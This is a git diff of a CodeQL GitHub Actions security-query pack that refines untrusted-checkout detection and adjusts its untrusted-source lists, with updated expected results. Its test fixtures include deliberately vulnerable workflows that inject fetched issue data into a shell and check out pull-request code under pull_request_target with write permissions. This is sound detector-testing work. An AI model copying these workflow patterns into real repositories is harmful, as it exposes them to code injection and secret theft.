a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b79a86ce27a..91b110f87ee 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -40,9 +40,10 @@ class GitHubCtxSource extends RemoteFlowSource { class GitHubEventCtxSource extends RemoteFlowSource { string flag; + string context; GitHubEventCtxSource() { - exists(Expression e, string context, string regexp | + exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and ( @@ -62,6 +63,8 @@ class GitHubEventCtxSource extends RemoteFlowSource { } override string getSourceType() { result = flag } + + string getContext() { result = context } } abstract class CommandSource extends RemoteFlowSource { diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index c9a78f6d0b6..336afdc73b1 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -197,9 +197,23 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and ( - exists(ActionsMutableRefCheckoutFlow::PathNode sink | - ActionsMutableRefCheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + exists( + ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink + | + ActionsMutableRefCheckoutFlow::flowPath(source, sink) and + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) and + ( + not source.getNode() instanceof GitHubEventCtxSource + or + source.getNode() instanceof GitHubEventCtxSource and + // the context is available for the job trigger events + exists(string context, string context_prefix | + contextTriggerDataModel(this.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + context = source.getNode().(GitHubEventCtxSource).getContext() and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) + ) ) or // heuristic base on the step id and field name @@ -241,9 +255,21 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and ( - exists(ActionsSHACheckoutFlow::PathNode sink | - ActionsSHACheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink | + ActionsSHACheckoutFlow::flowPath(source, sink) and + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) and + ( + not source.getNode() instanceof GitHubEventCtxSource + or + source.getNode() instanceof GitHubEventCtxSource and + // the context is available for the job trigger events + exists(string context, string context_prefix | + contextTriggerDataModel(this.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + context = source.getNode().(GitHubEventCtxSource).getContext() and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) + ) ) or // heuristic base on the step id and field name diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index 4c2451b5ab8..a5e8ced2e9e 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -40,8 +40,6 @@ extensions: - ["push", "github.event.commits"] - ["push", "github.event.head_commit"] - ["push", "github.event.changes"] - - ["repository_dispatch", "github.event.client_payload"] - - ["workflow_dispatch", "github.event.inputs"] - ["workflow_run", "github.event.workflow"] - ["workflow_run", "github.event.workflow_run"] - ["workflow_run", "github.event.changes"] diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml index 028671c243d..c3481c1cca5 100644 --- a/ql/lib/ext/config/externally_triggereable_events.yml +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -16,4 +16,5 @@ extensions: - ["pull_request_target"] - ["workflow_run"] # depending on branch filter - ["workflow_call"] # depending on caller - + - ["workflow_dispatch"] + - ["scheduled"] diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml index be2e1c9c798..1e54fa6eca3 100644 --- a/ql/lib/ext/config/untrusted_event_properties.yml +++ b/ql/lib/ext/config/untrusted_event_properties.yml @@ -24,8 +24,6 @@ extensions: - ["github\\.event\\.workflow_run\\.head_commit\\.message", "text"] - ["github\\.event\\.pull_request\\.head\\.repo\\.description", "text"] - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"] - - ["github\\.event\\.client_payload\\[[0-9]+\\]", "text"] - - ["github\\.event\\.client_payload", "text"] - ["github\\.event\\.changes\\.body\\.from", "title"] # BRANCH - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"] @@ -59,7 +57,6 @@ extensions: # JSON - ["github", "json"] - ["github\\.event", "json"] - - ["github\\.event\\.client_payload", "json"] - ["github\\.event\\.comment", "json"] - ["github\\.event\\.commits", "json"] - ["github\\.event\\.discussion", "json"] diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 4b87ad00c0f..84d85a99801 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -47,6 +47,8 @@ where ) and // the checkout occurs in a privileged context inPrivilegedContext(poisonable, event) and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout")) -select poisonable, checkout, poisonable, "Execution of untrusted code on a privileged workflow. $@", - event, event.getLocation().getFile().toString() +select poisonable, checkout, poisonable, + "Execution of untrusted code on a privileged workflow ($@)", event, + event.getLocation().getFile().toString() diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index b66822accab..decabad082f 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -1,13 +1,6 @@ edges -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index 393dde04f35..99ebb1edc05 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -1,14 +1,5 @@ edges -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml new file mode 100644 index 00000000000..552ad866b5a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml @@ -0,0 +1,33 @@ +on: + workflow_dispatch: + +jobs: + fetch-issues: + runs-on: ubuntu-latest + steps: + - name: Fetch open issues + id: issues + uses: octokit/request-action@v2.x + with: + route: GET /repos/foo/bar/issues?state=open + env: + GITHUB_TOKEN: ${{ secrets.GITHUBACTIONS_TOKEN }} + + - name: Write issues to file + run: | + echo '${{ steps.issues.outputs.data }}' > issues.json + + - name: Setup Node.js + uses: actions/setup-node@v2 + with: + node-version: '14' + + - name: Print issue URLs + run: | + const fs = require('fs'); + const issues = JSON.parse(fs.readFileSync('issues.json', 'utf8')); + const filteredIssues = issues.filter(issue => issue.body.includes('Is your portal managed or self-hosted?\r\n\r\nManaged')); + for (const issue of filteredIssues) { + console.log(issue.html_url); + } + shell: bash diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 1ad0d498791..83faf4eb5e4 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -159,6 +159,7 @@ edges | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -484,6 +485,8 @@ nodes | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -639,6 +642,7 @@ subpaths | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index eb852fdd4d2..15d526ca7b4 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -159,6 +159,7 @@ edges | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -484,6 +485,8 @@ nodes | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml new file mode 100644 index 00000000000..c4f90b97d05 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml @@ -0,0 +1,22 @@ +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v4 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: | + ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml new file mode 100644 index 00000000000..942b17967d3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml @@ -0,0 +1,22 @@ +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v4 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index 1160497a4a3..15d4813c40e 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -1,15 +1,25 @@ on: - pull_request_target + pull_request_target: jobs: - build: + test1: runs-on: ubuntu-latest - env: - HEAD: ${{ github.event.pull_request.head.sha }} steps: - uses: actions/checkout@v2 with: ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + test2: + runs-on: ubuntu-latest + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml index 5494d97797e..7e154502c13 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml @@ -1,34 +1,8 @@ -name: Auto Bump Versions - on: issue_comment: types: [created, edited] jobs: - add-same-version-label-to-pr: - runs-on: ubuntu-latest - if: github.event.issue.pull_request && contains(github.event.comment.body, '/add-same-version-label') - steps: - - uses: actions/checkout@v3 - - name: Add same version label - uses: actions/github-script@v6 - if: success() - with: - github-token: ${{secrets.GITHUB_TOKEN}} - script: | - github.rest.issues.addLabels({ - issue_number: context.issue.number, - owner: context.repo.owner, - repo: context.repo.repo, - labels: ['same version'] - }) - github.rest.issues.createComment({ - issue_number: context.issue.number, - owner: context.repo.owner, - repo: context.repo.repo, - body: '👋 Added [same version] label :)!' - }) - build: if: ${{ github.event.issue.pull_request }} && contains(github.event.comment.body, '/version') runs-on: ubuntu-latest @@ -75,26 +49,3 @@ jobs: run: | ./version.sh -u -p echo "BUMP_TYPE=patch" >> $GITHUB_ENV - - - name: Add labels - uses: actions/github-script@v6 - if: ${{ env.BUMP_TYPE }} - with: - script: | - github.rest.issues.addLabels({ - issue_number: context.issue.number, - owner: context.repo.owner, - repo: context.repo.repo, - labels: ['version/${{ env.BUMP_TYPE }}'] - }) - - - name: Push Changes - if: ${{ env.BUMP_TYPE }} - run: | - git config user.name 'github-actions[bot]' - git config user.email 'github-actions[bot]@users.noreply.github.com' - git pull - git add . - git commit -m "Update ${{ env.BUMP_TYPE }} version" --signoff - git push - diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index baf354179b3..237928fc892 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -265,6 +265,8 @@ edges | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:33:15:36:12 | Run Step | | .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | +| .github/workflows/test19.yml:16:7:21:4 | Uses Step | .github/workflows/test19.yml:21:7:22:14 | Run Step | +| .github/workflows/test20.yml:16:7:21:4 | Uses Step | .github/workflows/test20.yml:21:7:22:14 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -274,16 +276,14 @@ edges | .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | -| .github/workflows/untrusted_checkout4.yml:12:7:13:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:13:7:32:2 | Uses Step | -| .github/workflows/untrusted_checkout4.yml:37:7:55:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | -| .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | -| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | -| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | -| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | -| .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:91:7:100:9 | Run Step | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout4.yml:11:7:29:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | +| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | | .github/workflows/untrusted_checkout_5.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:21:9:23:23 | Run Step | @@ -294,44 +294,44 @@ edges | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | #select -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | -| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | -| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| 